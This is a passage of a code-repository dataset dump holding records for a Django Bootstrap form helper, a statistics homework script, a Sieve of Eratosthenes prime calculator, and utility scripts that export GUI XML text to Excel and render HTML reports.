attached as the changes to the workflow JSON lead to the need to be able to access further AWS resources (e.g. to invoke specified Lambdas or Activities)\n* The Role has no access to any resources after the initial deployment of the stack with this template\n* This template assumes that the Cloudformation Macro has been created with its default name, `StepFunctionWorkflowInjector` \n* The Macro is called as a `Transform`, so it has full visibility of the entire Cloudformation template\n\n## Licence\n\nThis project is released under the MIT license. See [LICENSE](LICENSE) for details.\n" } ]
2
nandel/django-form-helper
https://github.com/nandel/django-form-helper
50917a5245f13d7286c5e9cb0d9cda0dcdbb3aa5
89a447583eb4a199cdac264407d8242f82d7f642
4dbff0eec143bc6ee6a1f66ac7a6697b6937ef15
refs/heads/master
2021-01-19T09:44:08.773068
2013-11-10T14:18:11
2013-11-10T14:18:11
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6045694351196289, "alphanum_fraction": 0.6063268780708313, "avg_line_length": 21.68000030517578, "blob_id": "19e0997b2d8af34008c2fb29889db5c427f0ab66", "content_id": "6623dd3e36970eb6f9a02c2f450c6a16de8fd7c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 569, "license_type": "no_license", "max_line_length": 91, "num_lines": 25, "path": "/README.md", "repo_name": "nandel/django-form-helper", "src_encoding": "UTF-8", "text": "Django Form helper\n==================\ndjango-form-helper is a tool to render forms using bootstrap3 while developping with django\n\nInstall\n-----\nAdd ``form_helper`` in your ``INSTALLED_APPS``::\n\n\tINSTALLED_APPS = (\n\t...\n\t'form_helper',\n\t)\n\t\n\nUsage\n------\nIn your template use this syntax::\n\n {% load form_helper_bootstrap %}\n <fieldset>\n <legend>Info</legend>\n {{ form.title_field|render_field:\"horizontal\" }}\t\n {{ form.date_field|render_field:\"horizontal\" }}\t\n {{ form.text_field|render_field:\"horizontal\" }}\t\n </fieldset>\n\n\n" }, { "alpha_fraction": 0.5901544094085693, "alphanum_fraction": 0.5901544094085693, "avg_line_length": 29.380531311035156, "blob_id": "1069b35535d6eefa64a6540e4cb9e2846e50d283", "content_id": "4cd045bd27bf3649b07cb7dc96aab7e4d78d8516", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3433, "license_type": "no_license", "max_line_length": 130, "num_lines": 113, "path": "/form_helper/templatetags/form_helper_bootstrap.py", "repo_name": "nandel/django-form-helper", "src_encoding": "UTF-8", "text": "\"\"\"\nShortcut to use Bootstrap Forms\n\"\"\"\nfrom django import template\nfrom django.template import Context, loader\nimport form_helper\n\nregister = template.Library()\n\n# ---------------------------------------------------------\n# DEFAULT RENDER FUNCTONS TO WORK AUTOMATIC WITH BOOTSTRAP\n# ---------------------------------------------------------\n\n@register.filter\ndef render(form, style=None):\n\t\"\"\"\n\tRender the form with bootstrap\n\t\"\"\"\n\ttemplate = 'bootstrap'\n\tif style:\n\t\ttemplate = template + '-' + style\n\n\treturn form_helper.render(form, 'form_helper/' + template + '/form.html')\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render_fields(form, style=None):\n\t\"\"\"\n\tRender the Field with bootstrap\n\t\"\"\"\n\ttemplate = 'bootstrap'\n\tif style:\n\t\ttemplate = template + '-' + style\n\n\treturn form_helper.render_fields(form, 'form_helper/' + template + '/form-fields.html')\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render_field(field, style=None):\n\t\"\"\"\n\tRender a especified field with bootstrap\n\t\"\"\"\n\ttemplate = 'bootstrap'\n\tif style:\n\t\ttemplate = template + '-' + style\n\n\ttry:\n\t\tfield_classes = field.field.widget.attrs.get('class', '')\n\t\tfield_classes += ' form-control'\n\t\tfield.field.widget.attrs['class'] = field_classes\n\texcept:\n\t\tpass\n\n\treturn form_helper.render_field(field, 'form_helper/' + template + '/field-auto.html')\n\n# ---------------------------------------------------------\n# Functions to use with Prepend style of bootstrap\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef field_prepend_super(name, label, prepend=None, input=None, value=None, default=None, style=None, help_text=None, errors=None):\n\t\"\"\"\n\tOutput a field with a prepend accord to the 
parameters\n\tCan pass the input\n\t\"\"\"\n\ttemplate = 'bootstrap'\n\tif style:\n\t\ttemplate = template + '-' + style\n\n\ttmplt = loader.get_template('form_helper/' + template + '/field-with-prepend.html')\n\tcontext = Context({\n\t\t'name' : name,\n\t\t'label' : label,\n\t\t'value' : value,\n\t\t'default' : default,\n\t\t'help_text' : help_text,\n\t\t'errors' : errors,\n\t\t'prepend' : prepend,\n\t\t'input' : input\n\t})\n\treturn tmplt.render(context)\n\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef field_prepend(name, label, prepend=None, value=None, default=None, style=None, help_text=None, errors=None):\n\t\"\"\"\n\tOutput a field with prepend accord to the parameters\n\t\"\"\"\n\treturn field_prepend_super(name, label, prepend, None, value, default, style, help_text, errors)\n\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef field_prepend_email(name, label, value=None, default=None, style=None, help_text=None, errors=None):\n\t\"\"\"\n\tOutput a field with a prepend for email fields\n\t\"\"\"\n\tprepend = '<i class=\"glyphicon glyphicon-envelope\"></i>'\n\treturn field_prepend(name, label, prepend, value, default, style, help_text, errors)\n\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef field_prepend_password(name, label, style=None, help_text=None, errors=None):\n\t\"\"\"\n\tOutput a field with a prepend for pasword fields\n\t\"\"\"\n\tinput = '<input type=\"password\" class=\"form-control\" id=\"id_' + name + '\" name=\"' + name + '\" placeholder=\"' + label +'\">'\n\tprepend = '<i class=\"glyphicon glyphicon-lock\"></i>'\n\treturn field_prepend_super(name, label, prepend, input, None, None, style, help_text, errors)\n" }, { "alpha_fraction": 0.75157231092453, "alphanum_fraction": 0.75157231092453, "avg_line_length": 31.931034088134766, "blob_id": "eb31164c0011fbe61d6afefd984e416f6fbdd7b3", "content_id": "048f506d269e1346259df694504eb12bb75a6458", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 954, "license_type": "no_license", "max_line_length": 78, "num_lines": 29, "path": "/form_helper/forms.py", "repo_name": "nandel/django-form-helper", "src_encoding": "UTF-8", "text": "from django.template import Context, loader\n\nclass BaseForm(object):\n\t\"\"\"\n\tAbstract class to add some method to render the form\n\t\"\"\"\n\tdef as_template(self, template):\n\t\t\"Returns this form fields rendered as Bootstrap form.\"\n\t\ttmplt = loader.get_template(template)\n\t\tcontext = Context({\n\t\t\t'form': self,\n\t\t\t})\n\t\treturn tmplt.render(context)\n\nclass BaseBootstrap(BaseForm):\n\t\"\"\"\n\tAbstract class to add some method to render the form as Bootstrap\n\t\"\"\"\n\tdef as_bootstrap(self):\n\t\t\"Returns this form fields rendered as Bootstrap form.\"\n\t\treturn self.as_template('form_helper/bootstrap/form-fields.html')\n\n\tdef as_bootstrap_horizontal(self):\n\t\t\"Returns this form fields rendered as Bootstrap form-horizontal.\"\n\t\treturn self.as_template('form_helper/bootstrap-horizontal/form-fields.html')\n\n\tdef as_bootstrap_inline(self):\n\t\t\"Returns this form fields rendered as Bootstrap form-inline.\"\n\t\treturn self.as_template('form_helper/bootstrap-inline/form-fields.html')" }, { "alpha_fraction": 0.5788667798042297, "alphanum_fraction": 0.5793772339820862, "avg_line_length": 26.605634689331055, "blob_id": "e9275fbf2f1d493513ace48353bf15649fb643ab", "content_id": 
"ee84eb62966e7e9a855f9e18e7ad50a54f418a87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1959, "license_type": "no_license", "max_line_length": 188, "num_lines": 71, "path": "/form_helper/templatetags/form_helper.py", "repo_name": "nandel/django-form-helper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.template import Context, loader\n\nregister = template.Library()\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render(form, template=None):\n\ttmplt = loader.get_template(template)\n\tcontext = Context({\n\t\t'form': form,\n\t\t'method' : 'POST',\n\t\t'action' : '',\n\t\t'template' : template,\n\t})\n\treturn tmplt.render(context)\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render_fields(form, template=None):\n\ttmplt = loader.get_template(template)\n\tcontext = Context({\n\t\t'form': form,\n\t\t'method' : 'POST',\n\t\t'action' : '',\n\t\t'template' : template,\n\t})\n\treturn tmplt.render(context)\n\n# ---------------------------------------------------------\n\n@register.filter\ndef render_field(field, template=None):\n\ttmplt = loader.get_template(template)\n\tcontext = Context({\n\t\t'field': field,\n\t\t'template' : template,\n\t})\n\treturn tmplt.render(context)\n\n# ---------------------------------------------------------\n\n@register.simple_tag\ndef form_field(name, label, value=None, template=None, type=\"text\", default=None, help_text=None, errors=None, classes=None):\n\tif not template:\n\t\tinput_fields = ['text', 'password', 'color', 'date', 'datetime', 'datetime-local', 'email', 'file', 'hidden', 'image', 'month', 'number', 'range', 'search', 'tel', 'time', 'url', 'week']\n\n\t\tif type in input_fields:\n\t\t\ttemplate = 'form_helper/field-types/input.html'\n\t\telif type == 'checkbox' or type == 'radio' or type == 'textarea':\n\t\t\ttemplate = 'form_helper/field-types/' + type + '.html'\n\t\telse:\n\t\t\tprint \"%s field have a invalid type.\" % (name)\n\t\t\traise \"%s field have a invalid type.\" % (name)\n\n\ttmplt = loader.get_template(template)\n\tcontext = Context({\n\t\t'name': name,\n\t\t'label': label,\n\t\t'value': value,\n\t\t'default': default,\n\t\t'type': type,\n\t\t'style': style,\n\t\t'help_text': help_text,\n\t\t'errors': errors,\n\t\t'classes' : classes\n\t})\n\treturn tmplt.render(context)" } ]
4
yanxi853600/MSE_Tscore
https://github.com/yanxi853600/MSE_Tscore
f8bfde92e2472fc10af8d0b9c8548aabd1350483
a521ea2fde2b4989d8cd61a2703ccef581f9de30
98f83397555d2e9337868ed5ca85608ff4971ad8
refs/heads/master
2020-08-23T06:33:36.524792
2019-10-21T12:36:02
2019-10-21T12:36:02
216,562,090
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6141214966773987, "alphanum_fraction": 0.6447728276252747, "avg_line_length": 27.092308044433594, "blob_id": "13151fe37f448098f85b5ab9dbe3cb8b0cf9e03f", "content_id": "1c99b5be4259aa0890bda70d851c3d03ed837a21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2023, "license_type": "no_license", "max_line_length": 62, "num_lines": 65, "path": "/MSE.py", "repo_name": "yanxi853600/MSE_Tscore", "src_encoding": "UTF-8", "text": "#(10/9-homework_7107029258_林彥希)\n#1. 樣本集當母體 2.找出3個欄位 3. 對欄位進行抽樣 4. 做區間估計&T-檢定\n\n#import numpy as np\nimport pandas as pd\n#import matplotlib.pyplot as plt\nfrom scipy import stats\nimport math\n\n#download dataset\navocado=pd.read_csv(\"avocado.csv\")\n\ndf=pd.DataFrame([avocado[\"Total Volume\"],\n avocado[\"Total Bags\"],\n avocado[\"AveragePrice\"],\n avocado[\"Small Bags\"],\n avocado[\"Large Bags\"],\n avocado[\"XLarge Bags\"]]).T\n\n#大樣本區間估計\npopulation = []\nfor x in range(18249):\n Sample=df.sample(n=3,axis=1)\n \n population.append(Sample.mean())\n#print(\"母體平均:\", sum(population)/18249.0)\n \nSample_size = 100\n#Sample = np.random.choice(a=population, size=Sample_size) \n\n\nSample_mean = Sample.mean()\nprint(\"樣本平均:\", Sample_mean)\nSample_stdev = Sample.std()\nprint(\"樣本標準差:\", Sample_stdev)\nsigma = Sample_stdev/math.sqrt(Sample_size-1)\nprint(\"樣本計算出的母體標準差:\", sigma)\nz_critical = stats.norm.ppf(q=0.975)\nprint(\"Z分數:\", z_critical)\nmargin_of_error = z_critical * sigma\nconfidence_interval = (Sample_mean - margin_of_error,\n Sample_mean + margin_of_error)\n#print(confidence_interval)\nconf_int = stats.norm.interval(alpha=0.95, \n loc=Sample_mean, \n scale=sigma)\nprint(\"區間估計: \",conf_int[0], conf_int[1])\n\n\n#T檢定\npopulation_mean = 18249 #母體平均\n\nSample_size = len(Sample)\nSample_mean = Sample.mean()\n#print(\"樣本平均:\", Sample_mean)\nSample_stdev = Sample.std()\n#print(\"樣本標準差:\", Sample_stdev)\nsigma = Sample_stdev/math.sqrt(Sample_size-1)\n#print(\"樣本計算出的母體標準差:\", sigma)\nt_obtained = (Sample_mean-population_mean)/sigma\nprint(\"檢定統計量:\", t_obtained)\n#print(stats.ttest_1samp(a=Sample, popmean=population_mean))\n\nt_critical = stats.t.ppf(q=0.975, df=Sample_size-1)\nprint(\"t分數:\", t_critical)\n\n" } ]
1
vivek07kumar/Prime-number-calculator-using-Sieve-of-Eratosthenes
https://github.com/vivek07kumar/Prime-number-calculator-using-Sieve-of-Eratosthenes
7d7ce381185c723aef8080c888ebb588b1107e58
f141f6d0d2e6924d1f0bac8a66d6cce396087bdc
f9bd9c8568fd8f63557aa9b58681d8451c58d5de
refs/heads/main
2023-04-18T06:16:13.795144
2021-04-28T10:53:11
2021-04-28T10:53:11
343,320,047
0
0
null
2021-03-01T06:59:31
2021-03-01T07:08:32
2021-04-28T10:53:11
Python
[ { "alpha_fraction": 0.4771833121776581, "alphanum_fraction": 0.4948859214782715, "avg_line_length": 33.802818298339844, "blob_id": "5c0419e94a71b97c4fe253a82dee778d30e7c8cd", "content_id": "f958a02361d22ca59ed5bbd0467c34d2ac8029f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2542, "license_type": "permissive", "max_line_length": 103, "num_lines": 71, "path": "/Prime number calculator using Sieve of Eratosthenes.py", "repo_name": "vivek07kumar/Prime-number-calculator-using-Sieve-of-Eratosthenes", "src_encoding": "UTF-8", "text": "def userinput() :\r\n userinput_function = eval(input())\r\n return userinput_function\r\ndef prime_number_list_maker(par1,par2) :\r\n prime_list = []\r\n for x in range(par1,par2+1,1) :\r\n prime_list = prime_list + [x]\r\n return prime_list\r\ndef prime_numbers_finder(par1,par2,par3) :\r\n list1 = par3[:]\r\n for diviser in range(2,par2+1,1) :\r\n index = 0\r\n for dividend in list1 :\r\n if dividend != 0 :\r\n if diviser < dividend :\r\n remainder = dividend % diviser\r\n if remainder == 0 :\r\n list1[index] = 0\r\n index = index + 1\r\n result = []\r\n for x1 in list1 :\r\n if x1 > 1 :\r\n result = result + [x1]\r\n return result\r\ndef main() :\r\n print('================================================================+')\r\n print('* Please enter a positive integer : ',end = '')\r\n userinput1 = userinput()\r\n print('* Please enter another positive integer : ',end = '')\r\n userinput2 = userinput()\r\n if userinput1 > userinput2 :\r\n smaller_number = userinput2\r\n userinput2 = userinput1\r\n userinput1 = smaller_number\r\n print()\r\n print('>> Calculating, please wait...',end='')\r\n start_time = time()\r\n prime_number_list = prime_number_list_maker(userinput1,userinput2)\r\n user_result = prime_numbers_finder(userinput1,userinput2,prime_number_list)\r\n finish_time = time()\r\n print()\r\n print()\r\n print('>> PRIME NUMBERS : ',user_result)\r\n print()\r\n print('>> Total time taken for calculation : ',finish_time - start_time,'second/s')\r\n print()\r\n print('>> Total number of prime numbers between',userinput1,'and',userinput2,': ',len(user_result))\r\n print('================================================================+')\r\n print()\r\nfrom time import time\r\ndone = False\r\nprint()\r\nprint(' +------------------- PRIME NUMBER CALCULATOR ---------------------+')\r\nprint(' Using Sieve of Eratosthenes')\r\nprint()\r\nwhile not done :\r\n done2 = False\r\n main()\r\n while not done2 :\r\n userinputx = input('* Press C to Continue or Press E to Exit : ')\r\n if userinputx == 'c' or userinputx == 'C' :\r\n done2 = True\r\n print()\r\n elif userinputx == 'e' or userinputx == 'E' :\r\n done = True\r\n done2 = True\r\n print()\r\n else :\r\n print()\r\n print(' >>>> WRONG INPUT ! 
<<<<')\r\n print()\r\n" }, { "alpha_fraction": 0.743790864944458, "alphanum_fraction": 0.7607843279838562, "avg_line_length": 381.5, "blob_id": "cf0c2e7dd6757d55f2ecae0236a87c350b1d6a0e", "content_id": "f39915847f7805abe51421e731a36f58a92354d5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 765, "license_type": "permissive", "max_line_length": 710, "num_lines": 2, "path": "/README.md", "repo_name": "vivek07kumar/Prime-number-calculator-using-Sieve-of-Eratosthenes", "src_encoding": "UTF-8", "text": "# Prime-number-calculator-using-Sieve-of-Eratosthenes\nThis program uses an algorithm developed by the Greek mathematician Eratosthenes who lived from 274 B.C. to 195 B.C. Called the Sieve of Eratosthenes, the principle behind the algorithm is simple: Make a list of all the integers two and larger. Two is a prime number, but any multiple of two cannot be a prime number (since a multiple of two has two as a factor). Go through the rest of the list and mark out all multiples of two (4, 6, 8, ...). Move to the next number in the list (in this case, three). If it is not marked out, it must be prime, so go through the rest of the list and mark out all multiples of that number (6, 9, 12, ...). Continue this process until you have listed all the primes you want.\n" } ]
2
litefeel/mfscript
https://github.com/litefeel/mfscript
61e3d1b10745f1a8e0997b0d9dcfa424e60b1b16
f3402e546eb4b68acd9730780b716711427c0cd8
4967e443256ca68a3de90f2ad3c77073a2d6963a
refs/heads/master
2021-06-20T00:44:39.434381
2017-07-10T06:09:20
2017-07-10T06:09:20
92,374,963
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6046270132064819, "alphanum_fraction": 0.6298383474349976, "avg_line_length": 42.21794891357422, "blob_id": "b532a0848fe98410fe54636e2c4fa352087e1410", "content_id": "f45f0e485fd91554ab40bddadd038639c2bee4f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6747, "license_type": "no_license", "max_line_length": 784, "num_lines": 156, "path": "/exportxml.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n# pip install openpyxl\n\nimport os, os.path\nimport sys\nimport re\nimport argparse\nimport json\nimport shutil\nfrom openpyxl import load_workbook\nfrom function import readfile, writefile, copyfile\n\n# <com.g2d.studio.ui.edit.gui.UELabel Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" height=\"30\" local_bounds=\"0,0,60,30\" lock=\"true\" name=\"lb_title\" text=\"动作\" textBorderAlpha=\"0.0\" textBorderColor=\"0\" textColor=\"ffffffff\" textFont=\"\" textFontSize=\"20\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"60\" x=\"130.0\" y=\"4.0\" z=\"0.0\"/>\n# <com.g2d.studio.ui.edit.gui.UEButton Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" focusTextColor=\"ffffffff\" height=\"35\" imageAnchor=\"C_C\" imageAtlasDown=\"\" imageAtlasUp=\"\" imageOffsetX=\"0\" imageOffsetY=\"0\" imageTextDown=\"\" imageTextUp=\"\" local_bounds=\"0,0,35,35\" lock=\"true\" name=\"btn_close\" text=\"\" textBorderAlpha=\"100.0\" textBorderColor=\"ff000000\" textDown=\"\" textFont=\"\" textSize=\"0\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" unfocusTextColor=\"ffffffff\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"35\" x=\"807.0\" y=\"-3.0\" z=\"0.0\">\n# <com.g2d.studio.ui.edit.gui.UEToggleButton Attributes=\"\" ImageFont=\"\" clip_local_bounds=\"false\" clipbounds=\"false\" enable=\"true\" enable_childs=\"true\" focusTextColor=\"ffffffff\" height=\"78\" imageAnchor=\"C_C\" imageAtlasDown=\"#dynamic/associate/output/associate.xml|associate|9\" imageAtlasUp=\"#dynamic/associate/output/associate.xml|associate|11\" imageOffsetX=\"-15\" imageOffsetY=\"0\" imageTextDown=\"\" imageTextUp=\"\" isChecked=\"true\" local_bounds=\"0,0,121,78\" lock=\"true\" name=\"tbt_an1\" text=\"\" textBorderAlpha=\"100.0\" textBorderColor=\"ff000000\" textDown=\"\" textFont=\"\" textSize=\"0\" text_anchor=\"C_C\" text_offset_x=\"0\" text_offset_y=\"0\" uiAnchor=\"\" uiEffect=\"\" unfocusTextColor=\"ffffffff\" userData=\"\" userTag=\"0\" visible=\"true\" visible_content=\"true\" width=\"121\" x=\"0.0\" y=\"30.0\" z=\"0.0\">\nP_LABEL = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.(UELabel|UEButton|UEToggleButton) .*? name=\")([^\"]+)(\" .*text=\")([^\"]+)(\".*)$'\n# P_BUTTON = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.UEButton .*? name=\")(btn_([^\"]+))(\" .*text=\")([^\"]+)(\".*)$'\n# P_TBUTTON = r'^(<com\\.g2d\\.studio\\.ui\\.edit\\.gui\\.UEToggleButton .*? 
name=\")(tbt_([^\"]+))(\" .*text=\")([^\"]+)(\".*)$'\n\n\nerrors = []\n\nclass Config():\n __slots__ = (\"excelDir\", \"xmlDir\", \"backXmlDir\", \"excelTemplate\", \"out\")\n def __init__(self):\n pass\n\n def load(self, path):\n jsonObj = json.loads(readfile(path))\n self.excelDir = jsonObj['excelDir'].decode('utf-8').encode('gb2312')\n self.xmlDir = jsonObj['xmlDir'].decode('utf-8').encode('gb2312')\n self.backXmlDir = jsonObj['backXmlDir'].decode('utf-8').encode('gb2312')\n self.excelTemplate = jsonObj['excelTemplate'].decode('utf-8').encode('gb2312')\n self.out = jsonObj['out'].decode('utf-8').encode('gb2312')\n\n def parse(self, args):\n for k in self.__slots__:\n print(k)\n if args[k] is not None:\n self[k] = args[k].decode('utf-8').encode('gb2312')\n\ndef doKeys(xmlFile, duplicateKeys):\n global errors\n errors.append((xmlFile, duplicateKeys.items()))\n\ndef replaceXml(data, prefix):\n f = lambda g:\"\".join([g.group(1),g.group(3),g.group(4),prefix,g.group(2),g.group(6)])\n return re.sub(P_LABEL, f, data, 0, re.M)\n\ndef checkDuplicateName(name, map, errMap):\n count = map.get(name, 0) + 1\n map[name] = count\n if count > 1:\n errMap[name] = count\n return count > 1\n\ndef guixml2excel(xmlFile, backXmlFile, excelFile, prefix):\n data = readfile(xmlFile)\n matches = re.findall(P_LABEL, data, re.M)\n if len(matches) == 0:\n return\n\n writefile(backXmlFile, replaceXml(data, prefix))\n shutil.copyfile(config.excelTemplate, excelFile)\n\n \n # print(str(matches).encode('utf-8'))\n keys = dict()\n\n # <(name,value)>\n pairs = []\n duplicateKeys = dict()\n for match in matches:\n type = match[1]\n name = match[2]\n if checkDuplicateName(name, keys, duplicateKeys):\n continue\n pairs.append((name, match[4]))\n pairs.sort(key = lambda p: p[0])\n\n row = 2\n wb = load_workbook(excelFile, keep_vba = True)\n ws = wb.active\n for p in pairs:\n c = ws.cell(row=row, column=1)\n c.value = prefix + p[0]\n c = ws.cell(row=row, column=2)\n c.value = p[1]\n row = row + 1\n # print(match[0], match[1], match[2], type(match[2]))\n print(prefix, row - 2)\n wb.save(excelFile)\n if len(duplicateKeys) > 0:\n doKeys(xmlFile, duplicateKeys)\n\ndef doTask(root, file, config):\n name = file[0:-8]\n prefix = name + \"_\"\n xmlFile = os.path.join(root, file)\n excelFile = os.path.join(config.excelDir, '%s.xlsm' % name)\n relpath = os.path.relpath(xmlFile, config.xmlDir)\n backXmlFile = os.path.join(config.backXmlDir, relpath)\n copyfile(xmlFile, backXmlFile)\n guixml2excel(xmlFile, backXmlFile, excelFile, prefix)\n\n# -------------- main ----------------\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(usage='%(prog)s [options] config',\n description='export xmlui to excel')\n parser.add_argument('config', nargs = '?',\n help='config file')\n parser.add_argument('--excelDir', \n help='excelDir')\n parser.add_argument('--xmlDir', \n help='xmlDir')\n parser.add_argument('--backXmlDir', \n help='backXmlDir')\n parser.add_argument('--excelTemplate', \n help='excelTemplate')\n parser.add_argument('-o', '--out', \n help='out')\n\n # (\"excelDir\", \"xmlDir\", \"backXmlDir\", \"excelTemplate\", \"log\")\n args = parser.parse_args()\n # print(args.config)\n # \n config = Config()\n if args.config is not None:\n configPath = os.path.abspath(args.config)\n if not configPath.endswith('.json'):\n configPath = configPath + '.json'\n config.load(configPath)\n\n config.parse(vars(args))\n\n # global errors\n errors = []\n\n if not os.path.exists(config.excelDir):\n os.mkdir(config.excelDir)\n\n if not 
os.path.exists(config.backXmlDir):\n os.mkdir(config.backXmlDir)\n\n if os.path.exists(config.out):\n os.remove(config.out)\n\n for root, dirs, files in os.walk(config.xmlDir):\n for f in files:\n if f.endswith('.gui.xml'):\n doTask(root, f, config)\n\n if len(errors) > 0:\n from renderhtml import renderhtml\n renderhtml(errors, (\"key\", \"count\"), config.out)\n\n" }, { "alpha_fraction": 0.581818163394928, "alphanum_fraction": 0.581818163394928, "avg_line_length": 5.411764621734619, "blob_id": "ca44e309f801f09e98f642a923a2f891239d3324", "content_id": "694503e836cb99e086c8f4e2d2908d94e48c9f12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 144, "license_type": "no_license", "max_line_length": 20, "num_lines": 17, "path": "/README.md", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "\n#### 安装\n\n~~~\npip install openpyxl\n~~~\n\n\n#### 命令\n\n**rename.bat**\n\n重命名xml中的组件明\n\n\n**export.bat**\n\n导出xml文本到excel\n" }, { "alpha_fraction": 0.633217990398407, "alphanum_fraction": 0.6355248093605042, "avg_line_length": 21.789474487304688, "blob_id": "f3610905500260632aaa213bf48bebe644fe291e", "content_id": "70f635a96f4681a3e67a12d34ce1789493b99ffb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 60, "num_lines": 38, "path": "/function.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n\nimport os.path\nimport shutil\n\ndef makebasename(filename):\n dir = os.path.dirname(filename)\n if len(dir) > 0 and not os.path.exists(dir):\n os.makedirs(dir)\n\ndef readfile(filename, mode = 'r'):\n if not os.path.exists(filename):\n raise Exception('can not found file: %s' % filename)\n with open(filename, mode) as f:\n data = f.read()\n f.close()\n return data\n\ndef writefile(filename, data, mode = 'w'):\n makebasename(filename)\n with open(filename, mode) as f:\n f.write(data)\n f.close()\n\ndef copyfile(origin, to):\n makebasename(to)\n shutil.copyfile(origin, to)\n\ndef writeyaml(data, filename):\n import yaml\n s = yaml.dump(data)\n writefile(filename, s)\n\ndef readyaml(filename):\n data = readfile(filename)\n import yaml\n return yaml.load(data)\n\n" }, { "alpha_fraction": 0.6028732657432556, "alphanum_fraction": 0.6131349205970764, "avg_line_length": 30.387096405029297, "blob_id": "e7dea21168bddad9a66f1750aa79de764d1ddcfd", "content_id": "d4ee9815da49b572c09f3b925a5ff5b2d028a839", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1949, "license_type": "no_license", "max_line_length": 130, "num_lines": 62, "path": "/renderhtml.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n# pip install openpyxl\n\nimport os, os.path\nimport webbrowser\nimport tempfile\nfrom function import readfile, writefile\n\ndef addHead(htmls, filename):\n htmls.append('<hr/><h4>%s</h4>' % filename)\n\ndef addTableHead(htmls):\n htmls.append('<table>')\n\ndef addTableRaw(htmls, names):\n htmls.append('<tr>')\n for name in names:\n htmls.append('<th align=\"left\" width=\"200px\">%s</th>' % name)\n htmls.append('</tr>')\n\ndef addTableTail(htmls):\n htmls.append('</table>')\n\ndef addTable(htmls, list):\n addTableHead(htmls)\n for s in list:\n addTableRaw(htmls, s)\n addTableTail(htmls)\n\ndef printHtml(errors, config):\n htmls = ['<html><meta 
http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><body>\\n\\n']\n for arr in errors:\n addTableHead(htmls, os.path.relpath(arr[0], config.xmlDir))\n keys = arr[1]\n for k in sorted(keys.keys()):\n htmls.append('<tr><th align=\"left\" width=\"200px\">%s</th><th>%d</th></tr>' % (k, keys.get(k)))\n keys = arr[2]\n for k in sorted(keys.keys()):\n htmls.append('<tr><th align=\"left\" width=\"200px\"><font color=\"red\">%s</font></th><th>%d</th></tr>' % (k, keys.get(k)))\n addTableTail(htmls)\n htmls.append('</body></html>')\n writefile(config.log, '\\n'.join(htmls))\n webbrowser.open(config.log)\n\n\n\n# errors <(filename, <[oldname, newname, count]>)>\n# tableTitles (...)\ndef renderhtml(errors, tableTitles, htmlfile):\n htmls = ['<html><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><body>\\n\\n']\n for arr in errors:\n addHead(htmls, arr[0])\n addTable(htmls, arr[1])\n htmls.append('</body></html>')\n\n if htmlfile is None or len(htmlfile) == 0:\n f = tempfile.NamedTemporaryFile(suffix = '.html', delete=False)\n htmlfile = f.name\n\n writefile(htmlfile, ''.join(htmls))\n webbrowser.open(htmlfile)\n\n\n\n" }, { "alpha_fraction": 0.5796061754226685, "alphanum_fraction": 0.5850914120674133, "avg_line_length": 27.102766036987305, "blob_id": "4670f386a891a3c6018028ce188510265948e221", "content_id": "3ac0d6b8f463bfa24f664eb12e62c3e5da66c381", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7110, "license_type": "no_license", "max_line_length": 118, "num_lines": 253, "path": "/svnpatch.py", "repo_name": "litefeel/mfscript", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding=utf-8\n\nimport os\nimport sys\nimport shlex\nimport subprocess\nimport re\nimport tempfile\nimport argparse\nimport json\nimport xml.etree.ElementTree as ET\n\nSVN = r\"C:/Program Files/TortoiseSVN/bin/svn.exe\"\nTortoiseSVN = r\"C:/Program Files/TortoiseSVN/bin/TortoiseProc.exe\"\nBComp = 